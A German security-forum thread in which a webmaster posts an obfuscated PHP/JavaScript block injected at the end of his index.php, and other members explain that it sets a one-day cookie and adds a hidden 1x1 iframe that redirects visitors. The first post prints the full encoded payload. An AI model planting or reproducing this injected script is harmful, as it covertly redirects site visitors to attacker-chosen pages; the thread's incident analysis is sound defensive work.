Zurück   Trojaner-Board > Malware entfernen > Diskussionsforum

Diskussionsforum: [WEB] Code-Einschleusung

Windows 7 Hier sind ausschließlich fachspezifische Diskussionen erwünscht. Bitte keine Log-Files, Hilferufe oder ähnliches posten. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Bereinigungen von nicht ausgebildeten Usern sind hier untersagt. Wenn du dir einen Virus doer Trojaner eingefangen hast, eröffne ein Thema in den Bereinigungsforen oben.

Antwort
Alt 20.08.2013, 11:16   #1
infiniteloop
 
[WEB] Code-Einschleusung - Standard

[WEB] Code-Einschleusung



Hallo zusammen!

Ich weiß nicht ob sich hier jemand mit dem Thema auskennt. Vor kurzem wurde auf einer meiner Webseiten folgendes eingeschleust:
Code:
ATTFilter
#0f2490#
if(empty($tqz)) {$tqz = "<script type=\"text/javascript\" language=\"javascript\" >z=\"y\";vz=\"d\"+\"oc\"+\"ument\";ps=\"s\"+\"plit\";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff=\"fr\"+\"omCh\"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v=\"0x\";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)[\"\x62od\"+z]}catch(q){a2=\"_\";}z=\"2d_73_82_7b_70_81_76_7c_7b_2d_75_86_7f_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_2d_83_6e_7f_2d_75_86_7f_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7f_72_6e_81_72_52_79_72_7a_72_7b_81_35_34_76_73_7f_6e_7a_72_34_36_48_1a_17_1a_17_2d_75_86_7f_3b_80_7f_70_2d_4a_2d_34_75_81_81_7d_47_3c_3c_51_58_60_66_60_61_52_5a_3b_72_80_3c_76_7a_6e_74_72_7b_72_80_3c_55_4f_66_45_58_7e_40_81_3b_7d_75_7d_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_7d_7c_80_76_81_76_7c_7b_2d_4a_2d_34_6e_6f_80_7c_79_82_81_72_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_70_7c_79_7c_7f_2d_4a_2d_34_3e_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_75_72_76_74_75_81_2d_4a_2d_34_3e_7d_85_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_84_76_71_81_75_2d_4a_2d_34_3e_7d_85_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_79_72_73_81_2d_4a_2d_34_3e_3d_3d_3d_3e_34_48_1a_17_2d_75_86_7f_3b_80_81_86_79_72_3b_81_7c_7d_2d_4a_2d_34_3e_3d_3d_3d_3e_34_48_1a_17_1a_17_2d_76_73_2d_35_2e_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_75_86_7f_34_36_36_2d_88_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_84_7f_76_81_72_35_34_49_7d_2d_76_71_4a_69_34_75_86_7f_69_34_2d_70_79_6e_80_80_4a_69_34_75_86_7f_3d_46_69_34_2d_4b_49_3c_7d_4b_34_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_75_86_7f_34_36_3b_6e_7d_7d_72_7b_71_50_75_76_79_71_35_75_86_7f_36_48_1a_17_2d_8a_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_60_72_81_50_7c_7c_78_76_72_35_70_7c_7c_78_76_72_5b_6e_7a_72_39_70_7c_7c_78_76_72_63_6e_79_82_72_39_7b_51_6e_86_80_39_7d_6e_81_75_36_2d_88_1a_17_2d_83_6e_7f_2d_81_7c_71_6e_86_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_83_6e_7f_2d_72_85_7d_76_7f_72_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_76_73_2d_35_7b_51_6e_86_80_4a_4a_7b_82_79_79_2d_89_89_2d_7b_51_6e_86_80_4a_4a_3d_36_2d_7b_51_6e_86_80_4a_3e_48_1a_17_2d_72_85_7d_76_7f_72_3b_80_72_81_61_76_7a_72_35_81_7c_71_6e_86_3b_74_72_81_61_76_7a_72_35_36_2d_38_2d_40_43_3d_3d_3d_3d_3d_37_3f_41_37_7b_51_6e_86_80_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_2d_4a_2d_70_7c_7c_78_76_72_5b_6e_7a_72_38_2f_4a_2f_38_72_80_70_6e_7d_72_35_70_7c_7c_78_76_72_63_6e_79_82_72_36_1a_17_2d_38_2d_2f_48_72_85_7d_76_7f_72_80_4a_2f_2d_38_2d_72_85_7d_76_7f_72_3b_81_7c_54_5a_61_60_81_7f_76_7b_74_35_36_2d_38_2d_35_35_7d_6e_81_75_36_2d_4c_2d_2f_48_2d_7d_6e_81_75_4a_2f_2d_38_2d_7d_6e_81_75_2d_47_2d_2f_2f_36_48_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_54_72_81_50_7c_7c_78_76_72_35_2d_7b_6e_7a_72_2d_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_7f_81_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_7b_6e_7a_72_2d_38_2d_2f_4a_2f_2d_36_48_1a_17_2d_83_6e_7f_2d_79_72_7b_2d_4a_2d_80_81_6e_7f_81_2d_38_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_38_2d_3e_48_1a_17_2d_76_73_2d_35_2d_35_2d_2e_80_81_6e_7f_81_2d_36_2d_33_33_1a_17_2d_35_2d_7b_6e_7a_72_2d_2e_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_3d_39_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_36_2d_36_2d_36_1a_17_2d_88_1a_17_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_8a_1a_17_2d_76_73_2d_35_2d_80_81_6e_7f_81_2d_4a_4a_2d_3a_3e_2d_36_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_83_6e_7f_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_2f_48_2f_39_2d_79_72_7b_2d_36_48_1a_17_2d_76_73_2d_35_2d_72_7b_71_2d_4a_4a_2d_3a_3e_2d_36_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_79_72_7b_74_81_75_48_1a_17_2d_7f_72_81_82_7f_7b_2d_82_7b_72_80_70_6e_7d_72_35_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_75_86_7f_3d_46_35_36_48_1a_17_8a_1a_17_8a\"[ps](a2);za=\"\";aa(\"arCode\");e(\"\"+za);}</script>";echo $tqz;}
#/0f2490#
         
Die Einschleusung habe ich in der "index.php" gefunden, ganz unten nach dem letzten "</html>"-Tag. Die Webseite habe ich ohne CMS entwickelt und ist ganz einfach gebaut. (Keine Formulare / user-inputs.. nur Text und Bilder auf mehrere Seiten. PHP wird nur verwendet um die Inhalte von dem Layout getrennt zu halten)

Mich würde interessieren ob jemand diesen Code schon mal gesehen hat, und weiß was es bewirkt? Ich kenne mich zwar mit JS aus, aber das hier ist mir definitiv zu kryptisch..

Übrigens: wenn man z.Bsp. nach "if(empty($tqz))" googelt, findet man jede menge Seiten die auch mit einem ähnlichen Code befallen sind.

Viele Grüße,
IL

Alt 20.08.2013, 12:21   #2
mort
 
[WEB] Code-Einschleusung - Standard

[WEB] Code-Einschleusung



Dieser Code ist Obfuscated. Dies bedeutet, dass man im Anfangs-Zustand nicht wirklich sieht, was der Code wirklich tut. Um ihn wieder verständlich zu machen muss man ihn Deobfuscaten.

Nach dem ich den Code Deobfuscated habe, sehe ich was er wirklich macht. Der Code schaut nach einem Cookie. Falls dieser Cookie nicht gesetzt ist, setzt der Code diesen 1 Tag haltbaren Cookie und fügt einen 1x1 px großen iframe auf der Seite ein.
__________________


Alt 20.08.2013, 12:48   #3
infiniteloop
 
[WEB] Code-Einschleusung - Standard

[WEB] Code-Einschleusung



Hi mort,

Vielen Dank für die schnelle Antwort!

Konntest du auch die URL des iframes rauskriegen?

Ich habe zum Thema "deobfuscating / JS" etwas gegoogelt, und auch einige online-Deobfuscatoren gefunden - jedoch konnte ich damit den Code nicht wirklich lesbar machen. Was hast du verwendet?

Danke & Grüße,
IL
__________________

Alt 20.08.2013, 14:48   #4
mort
 
[WEB] Code-Einschleusung - Standard

[WEB] Code-Einschleusung



Zitat:
Konntest du auch die URL des iframes rauskriegen?
Ich kann dir leider aus Sicherheitsgründen keinen Link zur Seite geben. Aber in meinem Fall will die Seite mich auf eine andere weiterleiten.
Hier habe ich eine Web of Trust Bewertung der Seite auf die ich weitergeleitet werden soll.
-> malekal.com | WOT Reputation Scorecard | WOT (Web of Trust)


Zitat:
Was hast du verwendet?
Ich mach das per Hand. Der eigentliche Code ist "verschlüsselt" in einer Variable. Diesen "verschlüsselten" Code habe ich wie der Code selber manuell "entschlüsselt".

Alt 20.08.2013, 23:13   #5
infiniteloop
 
[WEB] Code-Einschleusung - Standard

[WEB] Code-Einschleusung



Zitat:
Zitat von mort Beitrag anzeigen
-> malekal.com | WOT Reputation Scorecard | WOT (Web of Trust)
da hätte ich wirklich etwas anderes erwartet. Die Seite scheint vetrauenswürdig zu sein und sogar sehr informativ.


Zitat:
Zitat von mort Beitrag anzeigen
(..) Diesen "verschlüsselten" Code habe ich wie der Code selber manuell "entschlüsselt".
Ich glaube ich komme auch langsam dahinter. Der Code beginnt mit dem Algorithmus der die Zeichenkette "z" entschlüsselt. Dann ist es auch klar, dass es per Online-Generator nicht geht..


Vielen Dank für deine Hilfe und für die Tipps!


Alt 21.08.2013, 00:18   #6
aharonov
/// TB-Ausbilder
 
[WEB] Code-Einschleusung - Standard

[WEB] Code-Einschleusung



Zitat:
da hätte ich wirklich etwas anderes erwartet. Die Seite scheint vetrauenswürdig zu sein und sogar sehr informativ.
Das ist sie auch. Sie haben diese redirects auf ihre Website bei malekal auch bemerkt: [en] Reveton go now by hacked website | malekal's site
Und vermuten:
Someone is probably trying to get the site blacklisted or to get bad reputation.
__________________
--> [WEB] Code-Einschleusung

Antwort

Themen zu [WEB] Code-Einschleusung
befallen, bewirkt, bilder, code, einfach, folge, folgendes, gefunde, getrennt, googel, googelt, hallo zusammen, inhalte, kurzem, layout, menge, script, thema, verwendet, web, webseite, webseiten, wickel, window, würde, zusammen



Ähnliche Themen: [WEB] Code-Einschleusung


  1. Posten in Code-Tags
    Log-Analyse und Auswertung - 29.09.2014 (1)
  2. Code-Einschleusung durch MediaWiki-Lücke
    Nachrichten - 30.01.2014 (0)
  3. vB Code Tags
    Log-Analyse und Auswertung - 15.08.2013 (5)
  4. vB Code Tags
    Lob, Kritik und Wünsche - 14.08.2013 (3)
  5. code für Einbettung von logfiles
    Alles rund um Windows - 17.05.2012 (2)
  6. HTML Code manipuliert
    Plagegeister aller Art und deren Bekämpfung - 03.06.2011 (1)
  7. Error Code -2147023174
    Log-Analyse und Auswertung - 26.04.2010 (34)
  8. Exploit-Code mit DNS-Tunnel
    Nachrichten - 18.03.2010 (0)
  9. Malewarebytes Error code: 721 (0,14)
    Log-Analyse und Auswertung - 18.11.2009 (3)
  10. Cannot boot from CD, Code: 5
    Alles rund um Windows - 09.11.2009 (5)
  11. Bösartigen Code in
    Diskussionsforum - 09.02.2007 (10)
  12. Tracking Code
    Plagegeister aller Art und deren Bekämpfung - 22.07.2006 (1)
  13. JoKe CoDe
    Mülltonne - 29.01.2006 (5)
  14. code red 2??
    Plagegeister aller Art und deren Bekämpfung - 04.08.2003 (0)
  15. Source-Code-Entfernung...
    Alles rund um Windows - 29.01.2003 (6)

Zum Thema [WEB] Code-Einschleusung - Hallo zusammen! Ich weiß nicht ob sich hier jemand mit dem Thema auskennt. Vor kurzem wurde auf einer meiner Webseiten folgendes eingeschleust: Code: Alles auswählen Aufklappen ATTFilter #0f2490# if(empty($tqz)) {$tqz - [WEB] Code-Einschleusung...
Archiv
Du betrachtest: [WEB] Code-Einschleusung auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.